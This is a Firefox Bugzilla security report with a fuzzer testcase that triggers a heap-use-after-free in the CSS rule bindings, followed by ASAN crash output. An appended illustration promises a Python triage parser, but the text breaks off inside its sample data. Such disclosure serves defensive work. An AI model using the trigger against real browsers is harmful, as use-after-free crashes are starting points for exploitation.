Closed
Bug 1415901
Opened 7 years ago
Closed 7 years ago
stylo: heap-use-after-free in mozilla::dom::CSSRuleBinding::get_parentRule
Categories
(Core :: DOM: CSS Object Model, defect, P2)
RESOLVED
DUPLICATE
of bug 1412145
People
(Reporter: nils, Unassigned)
References
Details
(Keywords: csectype-uaf, sec-high, Whiteboard: [adv-main58-])
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox nightly (SourceStamp=e2f87726b6082db0ae8a0866f65bff6b7062a07c). It requires the fuzzPriv extension.

crash.html:

<script>
// Synchronous XHR: spins the event loop so that deferred deletion runs.
function spin () {
  var x=new XMLHttpRequest();
  x.open("POST","https://mozilla.org",false);
  try{x.send("X");}catch(e){}
}
function start() {
  // Style sheet containing an (unterminated) @keyframes rule.
  o108=document.createElement('style');
  o108.textContent="@keyframes key9{ from {";
  document.documentElement.appendChild(o108);
  o124=document.styleSheets;
  o125=o124[0];
  o207=o125.cssRules;
  try{document.documentElement.before(undefined,o108);}catch(e){}
  o382=o207.item(0);
  // Keep only the keyframes rule's own cssRules list alive.
  o437=o382.cssRules;
  o382=o207=o125=o124=null;
  fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
  spin();
  // Accesses the parent rule after it has been freed.
  o1438=o437[0];
  o1438.parentRule;
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==29853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000267ad8 at pc 0x7fafcf1e0afb bp 0x7fff4b0f5900 sp 0x7fff4b0f58f8
READ of size 4 at 0x60c000267ad8 thread T0 (file:// Content)
    #0 0x7fafcf1e0afa in HasWrapperFlag /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:369:15
    #1 0x7fafcf1e0afa in IsDOMBinding /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:202
    #2 0x7fafcf1e0afa in CouldBeDOMBinding /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:902
    #3 0x7fafcf1e0afa in DoGetOrCreateDOMReflector<mozilla::css::Rule, mozilla::dom::binding_detail::GetOrCreateReflectorWrapBehavior::eWrapIntoContextCompartment> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:1093
    #4 0x7fafcf1e0afa in GetOrCreateDOMReflector<mozilla::css::Rule> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:1177
    #5 0x7fafcf1e0afa in mozilla::dom::CSSRuleBinding::get_parentRule(JSContext*, JS::Handle<JSObject*>, mozilla::css::Rule*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSRuleBinding.cpp:116
    #6 0x7fafcfedce46 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2909:13
    #7 0x7fafd62ee760 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #8 0x7fafd62ee760 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472
    #9 0x7fafd62f0735 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #10 0x7fafd62f0735 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #11 0x7fafd62f0735 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:655
    #12 0x7fafd7282a5c in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2117:16
    #13 0x7fafd7282a5c in GetExistingProperty<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2170
    #14 0x7fafd7282a5c in NativeGetPropertyInline<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2373
    #15 0x7fafd7282a5c in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2409
    #16 0x7fafd62f91c8 in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1607:12
    #17 0x7fafd62f91c8 in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:805
    #18 0x7fafd62f91c8 in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4379
    #19 0x7fafd62dc430 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:218:12
    #20 0x7fafd62dc430 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2780
    #21 0x7fafd62c1bca in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:12
    #22 0x7fafd62ee85f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:494:15
    #23 0x7fafd62ef752 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540:10
    #24 0x7fafd6d39a8b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
    #25 0x7fafcf8faa75 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #26 0x7fafd030078d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #27 0x7fafd030078d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #28 0x7fafd02c8816 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #29 0x7fafd02ca9e2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #30 0x7fafd02aa4f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #31 0x7fafd02ad9c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #32 0x7fafd259106e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #33 0x7fafd5630b6a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7765:21
    #34 0x7fafd562cb94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7563:7
    #35 0x7fafd56343ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7460:13
    #36 0x7fafcd1a0a73 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #37 0x7fafcd19fbdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #38 0x7fafcd19cc68 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
    #39 0x7fafcd19eb82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
    #40 0x7fafcd19f7dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
    #41 0x7fafcb713d40 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #42 0x7fafce37f47d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9402:18
    #43 0x7fafce37f041 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9324:9
    #44 0x7fafce359049 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5689:3
    #45 0x7fafce3d3232 in applyImpl<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #46 0x7fafce3d3232 in apply<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #47 0x7fafce3d3232 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #48 0x7fafcb5466f1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #49 0x7fafcb56b726 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #50 0x7fafcb585be8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #51 0x7fafcc348ed1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #52 0x7fafcc2a94db in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #53 0x7fafcc2a94db in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #54 0x7fafcc2a94db in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #55 0x7fafd1d2a5af in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
    #56 0x7fafd60441b7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #57 0x7fafcc2a94db in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #58 0x7fafcc2a94db in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #59 0x7fafcc2a94db in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #60 0x7fafd6043b6a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #61 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #62 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #63 0x7fafe8d0282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #64 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)

0x60c000267ad8 is located 24 bytes inside of 120-byte region [0x60c000267ac0,0x60c000267b38)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7fafcb406f07 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
    #2 0x7fafcb4115e4 in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
    #3 0x7fafcb4115e4 in nsCycleCollector_doDeferredDeletion() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4293
    #4 0x7fafccd59bf3 in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:124:34
    #5 0x7fafcb58ccef in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:339:22
    #6 0x7fafcb56b726 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #7 0x7fafcb585be8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #8 0x7fafd1b6d6e7 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3080:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #9 0x7fafd1b6d6e7 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3080
    #10 0x7fafd1b6ef0c in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909:11
    #11 0x7fafcf71bb7b in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1249:9
    #12 0x7fafcfedf260 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #13 0x7fafd62ee760 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #14 0x7fafd62ee760 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472
    #15 0x7fafd62d9feb in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:12
    #16 0x7fafd62d9feb in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3061
    #17 0x7fafd62c1bca in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:12
    #18 0x7fafd62ee85f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:494:15
    #19 0x7fafd62ef752 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540:10
    #20 0x7fafd6d39a8b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
    #21 0x7fafcf8faa75 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #22 0x7fafd030078d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #23 0x7fafd030078d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #24 0x7fafd02c8816 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #25 0x7fafd02ca9e2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #26 0x7fafd02aa4f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #27 0x7fafd02ad9c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #28 0x7fafd259106e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #29 0x7fafd5630b6a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7765:21
    #30 0x7fafd562cb94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7563:7
    #31 0x7fafd56343ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7460:13
    #32 0x7fafcd1a0a73 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #33 0x7fafcd19fbdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #34 0x7fafcd19cc68 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7fafd21097ae in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7fafd21097ae in mozilla::ServoCSSRuleList::GetRule(unsigned int) /builds/worker/workspace/build/src/layout/style/ServoCSSRuleList.cpp:105
    #4 0x7fafcf1e0fda in Item /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CSSRuleList.h:53:12
    #5 0x7fafcf1e0fda in mozilla::dom::CSSRuleListBinding::item(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CSSRuleList*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSRuleListBinding.cpp:58
    #6 0x7fafcfedf260 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #7 0x7fafd62ee760 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #8 0x7fafd62ee760 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472
    #9 0x7fafd62d9feb in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:12
    #10 0x7fafd62d9feb in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3061
    #11 0x7fafd62c1bca in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:12
    #12 0x7fafd62ee85f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:494:15
    #13 0x7fafd62ef752 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540:10
    #14 0x7fafd6d39a8b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
    #15 0x7fafcf8faa75 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #16 0x7fafd030078d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #17 0x7fafd030078d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #18 0x7fafd02c8816 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #19 0x7fafd02ca9e2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #20 0x7fafd02aa4f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #21 0x7fafd02ad9c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #22 0x7fafd259106e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #23 0x7fafd5630b6a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7765:21
    #24 0x7fafd562cb94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7563:7
    #25 0x7fafd56343ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7460:13
    #26 0x7fafcd1a0a73 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #27 0x7fafcd19fbdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #28 0x7fafcd19cc68 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
    #29 0x7fafcd19eb82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
    #30 0x7fafcd19f7dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
    #31 0x7fafcb713d40 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #32 0x7fafce37f47d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9402:18
    #33 0x7fafce37f041 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9324:9
    #34 0x7fafce359049 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5689:3

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:369:15 in HasWrapperFlag
Shadow bytes around the buggy address:
  0x0c1880044f00: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c1880044f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1880044f20: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1880044f30: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c1880044f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1880044f50: fa fa fa fa fa fa fa fa fd fd fd[fd]fd fd fd fd
  0x0c1880044f60: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1880044f70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1880044f80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1880044f90: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1880044fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29853==ABORTING
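A report like the one above is what a fuzzing pipeline has to bucket and deduplicate before a human looks at it. The Python below is added here as an illustration; it is not part of this bug or of Mozilla's tooling. It parses an abridged copy of the ASAN output from this bug (a constructed sample with most frames removed) into the fields a triager needs: bug type, access kind and size, the freed region, and the first non-allocator frame of the access, free and allocation stacks. It also checks that the "located N bytes inside of" arithmetic agrees with the faulting address. The regular expressions and the list of allocator-plumbing frame names are my own assumptions about the ASAN text format.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: an abridged copy of the report in this bug. Frame
# addresses and paths are as reported; most frames are omitted for brevity.
SAMPLE_REPORT = """\
==29853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000267ad8 at pc 0x7fafcf1e0afb bp 0x7fff4b0f5900 sp 0x7fff4b0f58f8
READ of size 4 at 0x60c000267ad8 thread T0 (file:// Content)
    #0 0x7fafcf1e0afa in HasWrapperFlag /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:369:15
    #1 0x7fafcf1e0afa in IsDOMBinding /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:202
    #5 0x7fafcf1e0afa in mozilla::dom::CSSRuleBinding::get_parentRule(JSContext*, JS::Handle<JSObject*>, mozilla::css::Rule*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSRuleBinding.cpp:116
0x60c000267ad8 is located 24 bytes inside of 120-byte region [0x60c000267ac0,0x60c000267b38)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7fafcb406f07 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
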